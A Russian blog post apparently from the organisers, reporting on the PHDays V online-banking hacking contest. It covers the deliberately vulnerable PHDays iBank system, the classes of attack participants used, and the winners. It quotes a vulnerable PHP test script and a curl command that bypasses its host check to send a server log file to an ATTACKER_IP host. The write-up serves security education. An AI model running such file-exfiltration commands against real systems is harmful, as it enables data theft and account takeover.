Pull to refresh

Как на PHDays V взламывали систему ДБО

Reading time 3 min
Views 11K


В рамках состоявшегося в Москве 26 и 27 мая форума по информационной безопасности Positive Hack Days V прошел традиционный конкурс по анализу защищенности систем ДБО «Большой ку$h». Соревнование проходило в два этапа: сначала участникам были предоставлены копии виртуальных машин, содержащие уязвимые веб-сервисы ДБО, аналогичные реальным системам. На втором этапе за один час участники должны были воспользоваться проблемами безопасности, обнаруженными при анализе образа системы ДБО, и перевести деньги из банка на свой счет.

В этом году отдельные конкурсы стали частью CTF (подробнее в нашей статье на Хабрахабре), и, наряду с гостями форума, участвовать в соревнованиях могли CTF-команды. Общее число участников конкурса составило порядка 30 человек, а призовой фонд в этом году увеличился до 40 тысяч рублей (в прошлом году можно было «украсть» 20 тысяч).



Технические подробности


Специально для конкурса «Большой ку$h» была разработана система ДБО PHDays iBank, содержащая уязвимости, которые встречаются в реальных банковских системах. В этот раз система была разделена на две части — frontend и backend, предоставляющий простейший RESTful API. Поэтому участникам было необходимо ознакомиться еще и с протоколом взаимодействия частей ДБО.

Как правило, в системах ДБО присутствуют не «топорные» ошибки безопасности, позволяющие провести прямую атаку с внедрением или исполнением зловредного кода, а логические уязвимости (слабые проверки, приводящие к утечке важных данных). Именно на них сделан акцент в конкурсной системе ДБО.

В PHDays iBank было заложено 7 комбинаций уязвимостей, на каждую комбинацию приходилось по 10 банковских счетов виртуальных пользователей, на которых хранились деньги (чем сложнее уязвимость, тем больше денег на счете).

Участники могли проводить следующие атаки:

  • брутфорс по спискам самых популярных паролей, доступных в Сети;
  • взлом аккаунтов с подключенной двухфакторной авторизацией (обход проверок);
  • эксплуатация уязвимостей в алгоритмах сброса паролей;
  • взаимодействие с тестовым сценарием, использовавшимся для контроля работоспособности API backend (обход проверок доступа, чтение произвольных файлов);
  • обход защиты механизма отложенных платежей (данная атака могла быть использована и для похищения денег со счетов других конкурсантов).

Несколько уязвимостей, заложенных в систему


Тестовый сценарий содержал следующий код:

<?php

if ($_SERVER['HTTP_HOST'] != 'ibank.dev') {
    exit;
}

if (empty($_GET['url'])) {
    exit;
}

$parts = parse_url($_GET['url']);
$port = empty($parts['port']) ? '' : ':' . $parts['port'];
$url = "http://{$parts['host']}$port/status";

$ch = curl_init();

curl_setopt_array($ch, [
//    CURLOPT_URL            => $_GET['url'],
    CURLOPT_URL            => $url,
    CURLOPT_HEADER         => false,
    CURLOPT_RETURNTRANSFER => true,
]);

if (!empty($_GET['params'])) {
    curl_setopt_array($ch, [
        CURLOPT_POST       => true,
        CURLOPT_POSTFIELDS => $_GET['params']
    ]);
}

var_dump(curl_exec($ch));

curl_close($ch);


Проверку имени хоста можно обойти. Зная про возможность передачи файлов и используя символ @ в значении параметра, можно провести следующую атаку:

curl -H 'Host: ibank.dev' 'http://SERVER_IP/api_test.php?url=http://ATTACKER_IP/&params\[a\]=@ /var/www/frontend/data/logs/mail.log'

Получив содержимое лог-файла отправленных сообщений, участник мог найти в них пароли к учетным записям, которые использовали систему восстановления пароля.

Для обхода двухфакторной аутентификации использовалась уязвимость, о которой не так давно писали на Хабре. Во время конкурса выяснилось, что не все участники были с ней знакомы, и поэтому работали по старинке, перебирая возможные значения.



Ход сражения


Участники могли не только атаковать систему ДБО, чтобы вывести средства из банка, но и атаковать счета друг друга, уводя с них деньги. Именно по этому пути пошли члены команды More Smoked Leet Chicken, которые выиграли соревнование. В итоге победителям удалось заработать более 15 тысяч рублей.

Стас Поволоцкий, ставший вторым, смог украсть из конкурсного банка более 3200 рублей.

Интересный момент: команда RDot, занявшая третье место, сумела найти и проэксплуатировать больше всех уязвимостей, однако ей не удалось защитить украденные деньги, которые были похищены с их счета командой More Smoked Leet Chicken.

Финальная турнирная таблица:



Поздравляем победителей!
Tags:
Hubs:
+16
Comments 9
Comments Comments 9

Articles

Information

Website
www.ptsecurity.com
Registered
Founded
2002
Employees
1,001–5,000 employees
Location
Россия